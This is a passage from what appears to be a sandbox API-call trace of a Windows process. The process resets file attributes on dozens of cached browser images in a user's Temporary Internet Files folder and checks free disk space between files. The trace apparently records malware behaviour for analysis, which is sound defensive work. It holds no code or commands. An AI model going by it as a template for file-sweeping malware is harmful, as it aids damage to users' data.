dwFileAttributes=0x80) returned 1 [0143.449] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.454] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png", dwFileAttributes=0x80) returned 1 [0143.468] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.473] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png", dwFileAttributes=0x80) returned 1 [0143.477] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.482] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png", dwFileAttributes=0x80) returned 1 [0143.484] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.489] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png", dwFileAttributes=0x80) returned 1 [0143.492] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.497] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png", dwFileAttributes=0x80) returned 1 [0143.500] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.505] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png", dwFileAttributes=0x80) returned 1 [0143.508] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.513] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png", dwFileAttributes=0x80) returned 1 [0143.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.521] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png", dwFileAttributes=0x80) returned 1 [0143.524] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.532] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg", dwFileAttributes=0x80) returned 1 [0143.535] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.541] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.544] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.549] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png", dwFileAttributes=0x80) returned 1 [0143.552] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.557] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg", dwFileAttributes=0x80) returned 1 [0143.560] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.565] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png", dwFileAttributes=0x80) returned 1 [0143.568] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.573] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png", dwFileAttributes=0x80) returned 1 [0143.576] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.581] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm", dwFileAttributes=0x80) returned 1 [0143.584] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.623] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png", dwFileAttributes=0x80) returned 1 [0143.626] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.631] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png", dwFileAttributes=0x80) returned 1 [0143.634] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.639] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg", dwFileAttributes=0x80) returned 1 [0143.642] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.647] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.649] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.654] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.657] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.663] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg", dwFileAttributes=0x80) returned 1 [0143.666] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.671] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg", dwFileAttributes=0x80) returned 1 [0143.674] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.679] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg", dwFileAttributes=0x80) returned 1 [0143.682] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.687] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg", dwFileAttributes=0x80) returned 1 [0143.690] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.695] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.704] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg", dwFileAttributes=0x80) returned 1 [0143.707] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.712] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg", dwFileAttributes=0x80) returned 1 [0143.715] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.720] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg", dwFileAttributes=0x80) returned 1 [0143.723] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.735] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg", dwFileAttributes=0x80) returned 1 [0143.738] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.743] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg", dwFileAttributes=0x80) returned 1 [0143.747] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.752] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg", dwFileAttributes=0x80) returned 1 [0143.755] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.761] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg", dwFileAttributes=0x80) returned 1 [0143.763] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.770] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg", dwFileAttributes=0x80) returned 1 [0143.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.778] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg", dwFileAttributes=0x80) returned 1 [0143.781] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.787] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg", dwFileAttributes=0x80) returned 1 [0143.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.796] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg", dwFileAttributes=0x80) returned 1 [0143.800] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.805] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.813] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg", dwFileAttributes=0x80) returned 1 [0143.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.821] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.824] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.830] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg", dwFileAttributes=0x80) returned 1 [0143.834] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.840] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg", dwFileAttributes=0x80) returned 1 [0143.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.848] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg", dwFileAttributes=0x80) returned 1 [0143.851] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.856] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg", dwFileAttributes=0x80) returned 1 [0143.859] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.864] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg", dwFileAttributes=0x80) returned 1 [0143.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.872] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg", dwFileAttributes=0x80) returned 1 [0143.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.880] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg", dwFileAttributes=0x80) returned 1 [0143.883] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.888] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg", dwFileAttributes=0x80) returned 1 [0143.891] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: 